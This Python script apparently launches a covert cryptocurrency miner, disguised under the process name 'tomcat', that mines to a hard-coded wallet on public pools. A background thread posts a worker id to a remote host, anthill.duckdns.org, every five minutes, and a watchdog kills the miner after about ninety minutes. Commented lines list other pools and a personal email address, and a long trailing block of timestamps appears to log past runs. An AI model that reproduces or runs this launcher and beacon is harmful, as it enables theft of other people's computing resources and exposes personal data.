import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:53:01.716953
#2018-02-17 17:39:05.237259
#2018-02-17 19:27:04.123100
#2018-02-17 21:16:04.815363
#2018-02-17 23:00:01.631246
#2018-02-18 00:46:05.868360
#2018-02-18 02:35:06.680268
#2018-02-18 04:22:06.990433
#2018-02-18 06:14:06.147834
#2018-02-18 08:04:04.268741
#2018-02-18 09:52:05.614414
#2018-02-18 11:43:05.554857
#2018-02-18 13:28:03.654448
#2018-02-18 15:18:05.574832
#2018-02-18 17:07:04.800872
#2018-02-18 18:54:05.553407
#2018-02-18 20:41:05.716456
#2018-02-18 22:26:02.095157
#2018-02-19 00:15:06.211480
#2018-02-19 02:01:06.564122
#2018-02-19 03:49:06.790316
#2018-02-19 05:35:04.144086
#2018-02-19 07:23:06.747855
#2018-02-19 09:12:07.616142
#2018-02-19 11:02:07.058198
#2018-02-19 12:50:13.289214
#2018-02-19 14:38:04.808663
#2018-02-19 16:25:02.929810
#2018-02-19 18:11:08.690555
#2018-02-19 19:58:06.584068
#2018-02-19 21:46:07.949702
#2018-02-19 23:31:07.218918
#2018-02-20 01:17:03.913207
#2018-02-20 03:07:01.878027
#2018-02-20 04:54:01.297765
#2018-02-20 06:37:05.595161
#2018-02-20 08:22:07.388347
#2018-02-20 10:07:07.809842
#2018-02-20 11:51:10.794966
#2018-02-20 13:40:07.306686
#2018-02-20 15:25:13.968796
#2018-02-20 17:10:01.915770
#2018-02-20 18:58:07.492022
#2018-02-20 20:47:05.925490
#2018-02-20 22:31:06.542889
#2018-02-21 00:12:07.648136
#2018-02-21 01:58:06.829971
#2018-02-21 03:46:04.917964
#2018-02-21 05:35:06.149871
#2018-02-21 07:25:05.571841
#2018-02-21 09:09:05.800546
#2018-02-21 10:57:06.939467
#2018-02-21 12:45:06.802012
#2018-02-21 14:33:08.082736
#2018-02-21 16:21:11.172666
#2018-02-21 18:12:05.418472
#2018-02-21 19:58:07.092564
#2018-02-21 21:45:07.314896
#2018-02-21 23:33:05.600734
#2018-02-22 01:19:05.389585
#2018-02-22 03:09:05.118404
#2018-02-22 04:54:05.156252
#2018-02-22 06:39:06.871933
#2018-02-22 08:27:04.361409
#2018-02-22 10:14:07.560666
#2018-02-22 11:59:10.940329
#2018-02-22 13:45:09.247000
#2018-02-22 15:32:06.487147
#2018-02-22 17:18:01.295245
#2018-02-22 19:04:07.855711
#2018-02-22 20:57:07.704513
#2018-02-22 22:44:07.750808
#2018-02-23 00:29:06.965714
#2018-02-23 02:16:05.715660
#2018-02-23 04:04:04.109377
#2018-02-23 05:50:01.304070
#2018-02-23 07:39:06.652843
#2018-02-23 09:41:07.533503
#2018-02-23 11:47:04.391082
#2018-02-23 13:37:01.941185
#2018-02-23 15:24:05.978356
#2018-02-23 17:13:09.588196
#2018-02-23 18:56:09.002113
#2018-02-23 20:42:07.728560
#2018-02-23 22:29:05.960568
#2018-02-24 00:16:04.926530
#2018-02-24 02:07:02.150817
#2018-02-24 03:56:05.362825
#2018-02-24 05:43:05.188431
#2018-02-24 07:34:07.328865
#2018-02-24 09:21:01.748651
#2018-02-24 11:14:03.588705
#2018-02-24 13:04:04.065928
#2018-02-24 14:51:05.057662
#2018-02-24 16:42:06.748841
#2018-02-24 18:30:08.823631
#2018-02-24 20:16:05.776226
#2018-02-24 22:08:05.800098
#2018-02-25 01:06:02.142088
#2018-02-25 03:58:02.055577
#2018-02-25 06:42:04.968669
#2018-02-25 11:36:07.612590
#2018-02-25 13:53:01.561425
#2018-02-25 15:27:01.585457